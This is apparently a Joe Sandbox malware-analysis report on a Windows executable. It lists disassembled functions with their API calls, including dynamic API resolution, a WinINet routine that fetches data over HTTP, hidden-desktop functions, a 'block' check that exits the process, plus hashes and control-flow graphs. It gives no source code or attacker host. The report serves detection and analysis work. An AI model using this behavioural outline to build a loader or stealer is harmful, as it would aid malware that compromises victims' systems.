                            • GetProcAddress.KERNEL32(75A70000,00BE5E30), ref: 00D86F21
                            • GetProcAddress.KERNEL32(75A70000,00BFD488), ref: 00D86F39
                            • GetProcAddress.KERNEL32(75A70000,00BFD398), ref: 00D86F52
                            • GetProcAddress.KERNEL32(75A70000,00BFD4D0), ref: 00D86F6A
                            • GetProcAddress.KERNEL32(75A70000,00BFD3E0), ref: 00D86F82
                            • GetProcAddress.KERNEL32(75450000,00BE6010), ref: 00D86F9E
                            • GetProcAddress.KERNEL32(75450000,00BE5D30), ref: 00D86FB6
                            • GetProcAddress.KERNEL32(75DA0000,00BE5FF0), ref: 00D86FD2
                            • GetProcAddress.KERNEL32(75DA0000,00BFD4A0), ref: 00D86FEA
                            • GetProcAddress.KERNEL32(6F070000,00BE6070), ref: 00D8700A
                            • GetProcAddress.KERNEL32(6F070000,00BE6050), ref: 00D87022
                            • GetProcAddress.KERNEL32(6F070000,00BE5E50), ref: 00D8703B
                            • GetProcAddress.KERNEL32(6F070000,00BFD3C8), ref: 00D87053
                            • GetProcAddress.KERNEL32(6F070000,00BE5C90), ref: 00D8706B
                            • GetProcAddress.KERNEL32(6F070000,00BE5CF0), ref: 00D87084
                            • GetProcAddress.KERNEL32(6F070000,00BE5E70), ref: 00D8709C
                            • GetProcAddress.KERNEL32(6F070000,00BE5D10), ref: 00D870B4
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D870CB
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D870E2
                            • GetProcAddress.KERNEL32(75AF0000,00BFCE88), ref: 00D870FE
                            • GetProcAddress.KERNEL32(75AF0000,00BF8DB0), ref: 00D87116
                            • GetProcAddress.KERNEL32(75AF0000,00BFCEA0), ref: 00D8712F
                            • GetProcAddress.KERNEL32(75AF0000,00BFCF48), ref: 00D87147
                            • GetProcAddress.KERNEL32(75D90000,00BE5D70), ref: 00D87163
                            • GetProcAddress.KERNEL32(6E240000,00BFCE58), ref: 00D8717F
                            • GetProcAddress.KERNEL32(6E240000,00BE5E90), ref: 00D87197
                            • GetProcAddress.KERNEL32(6E240000,00BFCFA8), ref: 00D871B0
                            • GetProcAddress.KERNEL32(6E240000,00BFCE28), ref: 00D871C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 70012f7888d4eac47c91b569a5b32d3db4af485a5c11fbd12ba165cc81921e11
                            • Instruction ID: 5c5a7e0bde8b1d7fc27bbd9cd187866a98c2d20a0386717062c96805ad7ff208
                            • Opcode Fuzzy Hash: 70012f7888d4eac47c91b569a5b32d3db4af485a5c11fbd12ba165cc81921e11
                            • Instruction Fuzzy Hash: E16262B55182089FD764DF78EC88A2637B9F789781301851FE966C3374DBB49852FB20
                            Function 00D7F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D7F1D5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F1F1
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D7F1FC
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F215
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D7F220
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F239
                            • lstrcpy.KERNEL32(00000000,00D94FA0), ref: 00D7F25E
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F28C
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F2C0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F2F0
                            • lstrlen.KERNEL32(00BE63F0), ref: 00D7F315
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 9c7398eb3e857c7733d7414f0ced6734e637cc4dae74007c280dd96b95dfb69d
                            • Instruction ID: 4edbde69468ca2999fbee764dee6f9f56f6d2a9d5894432150eb7a98befd685c
                            • Opcode Fuzzy Hash: 9c7398eb3e857c7733d7414f0ced6734e637cc4dae74007c280dd96b95dfb69d
                            • Instruction Fuzzy Hash: F2A229709116068FCB20DF69D949A6ABBB5BF48314F19C47AE809DB261EB71DC42CB70
                            Function 00D7FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80013
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D800BD
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D800E1
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D800EC
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80110
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D8011B
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8013F
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D8015A
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80189
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D80194
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D801C3
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D801CE
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80206
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D80250
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80288
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D8059B
                            • lstrlen.KERNEL32(00BE63D0), ref: 00D805AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D805D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00D805E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8060E
                            • lstrlen.KERNEL32(00BFE060), ref: 00D80625
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D8064C
                            • lstrcat.KERNEL32(00000000,?), ref: 00D80658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D80681
                            • lstrlen.KERNEL32(00BE60B0), ref: 00D80698
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D806C9
                            • lstrcat.KERNEL32(00000000,?), ref: 00D806D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D80706
                            • lstrcpy.KERNEL32(00000000,00BF8CE0), ref: 00D8074B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D8077F
                            • lstrcpy.KERNEL32(00000000,00BFE270), ref: 00D807E7
                            • lstrcpy.KERNEL32(00000000,00BF8FD0), ref: 00D80858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00D808CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D80928
                            • lstrcpy.KERNEL32(00000000,00BF8F90), ref: 00D809F8
                              • Part of subcall function 00D624E0: lstrcpy.KERNEL32(00000000,?), ref: 00D62528
                              • Part of subcall function 00D624E0: lstrcpy.KERNEL32(00000000,?), ref: 00D6254E
                              • Part of subcall function 00D624E0: lstrcpy.KERNEL32(00000000,?), ref: 00D62577
                            • lstrcpy.KERNEL32(00000000,00BF8F70), ref: 00D80ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D80B81
                            • lstrcpy.KERNEL32(00000000,00BF8F70), ref: 00D80D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: 8ca3bc61b134e3a8307dd9eb14892a92f9c449535bc129cbd6bcfa8e8d2f9a68
                            • Instruction ID: 2c5bfcb0ee8f38151af9c6295450857ce5c8b6f337dbca8fc6a2f47f69a31201
                            • Opcode Fuzzy Hash: 8ca3bc61b134e3a8307dd9eb14892a92f9c449535bc129cbd6bcfa8e8d2f9a68
                            • Instruction Fuzzy Hash: 3AE26D749053418FD774EF29C489B6ABBE4FF88304F58856EE44D8B252DB31D84ACB62
                            Function 00D66C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 d66c40-d66c64 call d62930 2237 d66c66-d66c6b 2234->2237 2238 d66c75-d66c97 call d64bc0 2234->2238 2237->2238 2240 d66c6d-d66c6f lstrcpy 2237->2240 2242 d66caa-d66cba call d62930 2238->2242 2243 d66c99 2238->2243 2240->2238 2247 d66cbc-d66cc2 lstrcpy 2242->2247 2248 d66cc8-d66cf5 InternetOpenA StrCmpCA 2242->2248 2244 d66ca0-d66ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 d66cf7 2248->2249 2250 d66cfa-d66cfc 2248->2250 2249->2250 2251 d66d02-d66d22 InternetConnectA 2250->2251 2252 d66ea8-d66ebb call d62930 2250->2252 2254 d66ea1-d66ea2 InternetCloseHandle 2251->2254 2255 d66d28-d66d5d HttpOpenRequestA 2251->2255 2259 d66ebd-d66ebf 2252->2259 2260 d66ec9-d66ee0 call d62a20 * 2 2252->2260 2254->2252 2257 d66e94-d66e9e InternetCloseHandle 2255->2257 2258 d66d63-d66d65 2255->2258 2257->2254 2261 d66d67-d66d77 InternetSetOptionA 2258->2261 2262 d66d7d-d66dad HttpSendRequestA HttpQueryInfoA 2258->2262 2259->2260 2265 d66ec1-d66ec3 lstrcpy 2259->2265 2261->2262 2263 d66dd4-d66de4 call d83d90 2262->2263 2264 d66daf-d66dd3 call d871e0 call d62a20 * 2 2262->2264 2263->2264 2275 d66de6-d66de8 2263->2275 2265->2260 2277 d66dee-d66e07 InternetReadFile 2275->2277 2278 d66e8d-d66e8e InternetCloseHandle 2275->2278 2277->2278 2280 d66e0d 2277->2280 2278->2257 2282 d66e10-d66e15 2280->2282 2282->2278 2283 d66e17-d66e3d call d87310 2282->2283 2286 d66e44-d66e51 call d62930 2283->2286 2287 d66e3f call d62a20 2283->2287 2291 d66e53-d66e57 2286->2291 2292 d66e61-d66e8b call d62a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 d66e59-d66e5b lstrcpy 2291->2293 2292->2278 2292->2282 2293->2292
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D66C6F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66CC2
                            • InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D66CD5
                            • StrCmpCA.SHLWAPI(?,00BFE7E0), ref: 00D66CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D66D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,00BFE288,00000000,00000000,-00400100,00000000), ref: 00D66D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D66D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D66D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00D66DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D66DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D66E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00D66E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00D66E8E
                            • InternetCloseHandle.WININET(?), ref: 00D66E98
                            • InternetCloseHandle.WININET(00000000), ref: 00D66EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D66EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: cc7769cf57f84bbb40bad127311603af8c743175d66b21fbc1a578f8f06c6edd
                            • Instruction ID: 7edabdb798e57db75964305c05eee2929b9f92c130105bc5424cf91dfcec9dbf
                            • Opcode Fuzzy Hash: cc7769cf57f84bbb40bad127311603af8c743175d66b21fbc1a578f8f06c6edd
                            • Instruction Fuzzy Hash: 2581C271A41619ABEB20DFA4DC49FAE77B8EF44700F184029F905E7281DB70EE458BB0
                            Function 00D7F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00BE63F0), ref: 00D7F315
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F47B
                            • lstrcpy.KERNEL32(00000000,00BE63F0), ref: 00D7F4BB
                            • lstrcpy.KERNEL32(00000000,00BF8D80), ref: 00D7F4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D7F61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00D7F718
                            • lstrlen.KERNEL32(00BF8EA0), ref: 00D7F746
                            • lstrcpy.KERNEL32(00000000,00BF8EA0), ref: 00D7F771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F793
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00D7FA32
                            • lstrlen.KERNEL32(00BF8CD0), ref: 00D7FA60
                            • lstrcpy.KERNEL32(00000000,00BF8CD0), ref: 00D7FA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7FAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7FAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 6e38a281d6e15903fedcc1c3e5472bda6e88cd80dfecb5bf3cad68aa8921a5c1
                            • Instruction ID: a95c26320b2b83aa48d8edd0975696b362b8f89da787d7e9087fb6aca93dda88
                            • Opcode Fuzzy Hash: 6e38a281d6e15903fedcc1c3e5472bda6e88cd80dfecb5bf3cad68aa8921a5c1
                            • Instruction Fuzzy Hash: DCF10670A056068FDB24DF69C894A69B7E5BF48314B2DC4BED80D9B2A1F771DC42CB60
                            Function 00D78CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2721 d78ca0-d78cc4 StrCmpCA 2722 d78cc6-d78cc7 ExitProcess 2721->2722 2723 d78ccd-d78ce6 2721->2723 2725 d78ee2-d78eef call d62a20 2723->2725 2726 d78cec-d78cf1 2723->2726 2727 d78cf6-d78cf9 2726->2727 2729 d78ec3-d78edc 2727->2729 2730 d78cff 2727->2730 2729->2725 2767 d78cf3 2729->2767 2732 d78e56-d78e64 StrCmpCA 2730->2732 2733 d78d30-d78d3f lstrlen 2730->2733 2734 d78dbd-d78dcb StrCmpCA 2730->2734 2735 d78ddd-d78deb StrCmpCA 2730->2735 2736 d78dfd-d78e0b StrCmpCA 2730->2736 2737 d78e1d-d78e2b StrCmpCA 2730->2737 2738 d78e3d-d78e4b StrCmpCA 2730->2738 2739 d78d5a-d78d69 lstrlen 2730->2739 2740 d78d06-d78d15 lstrlen 2730->2740 2741 d78d84-d78d92 StrCmpCA 2730->2741 2742 d78da4-d78db8 StrCmpCA 2730->2742 2743 d78e6f-d78e7d StrCmpCA 2730->2743 2744 d78e88-d78e9a lstrlen 2730->2744 2732->2729 2756 d78e66-d78e6d 2732->2756 2760 d78d41-d78d46 call d62a20 2733->2760 2761 d78d49-d78d55 call d62930 2733->2761 2734->2729 2749 d78dd1-d78dd8 2734->2749 2735->2729 2750 d78df1-d78df8 2735->2750 2736->2729 2751 d78e11-d78e18 2736->2751 2737->2729 2752 d78e31-d78e38 2737->2752 2738->2729 2753 d78e4d-d78e54 2738->2753 2745 d78d73-d78d7f call d62930 2739->2745 2746 d78d6b-d78d70 call d62a20 2739->2746 2754 d78d17-d78d1c call d62a20 2740->2754 2755 d78d1f-d78d2b call d62930 2740->2755 2741->2729 2748 d78d98-d78d9f 2741->2748 2742->2729 2743->2729 2757 d78e7f-d78e86 2743->2757 2758 d78ea4-d78eb0 call d62930 2744->2758 2759 d78e9c-d78ea1 call d62a20 2744->2759 2779 d78eb3-d78eb5 2745->2779 2746->2745 2748->2729 2749->2729 2750->2729 2751->2729 2752->2729 2753->2729 2754->2755 2755->2779 2756->2729 2757->2729 2758->2779 2759->2758 2760->2761 2761->2779 2767->2727 2779->2729 2780 d78eb7-d78eb9 2779->2780 2780->2729 2781 d78ebb-d78ebd lstrcpy 2780->2781 2781->2729
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 2f87ee52bd22f79fd22701ee72fe6f01c9c117cb6d850a99fd3ae9f9f40165fd
                            • Instruction ID: 1d9999ace6aed0d611895148d4d66cc22bac84ef212e9cdaf31dc1746462b3db
                            • Opcode Fuzzy Hash: 2f87ee52bd22f79fd22701ee72fe6f01c9c117cb6d850a99fd3ae9f9f40165fd
                            • Instruction Fuzzy Hash: 30516C70A847059FCB209F75DC98E2B7BF4BF44704B14881EF48AC2611EBB6E546AB31
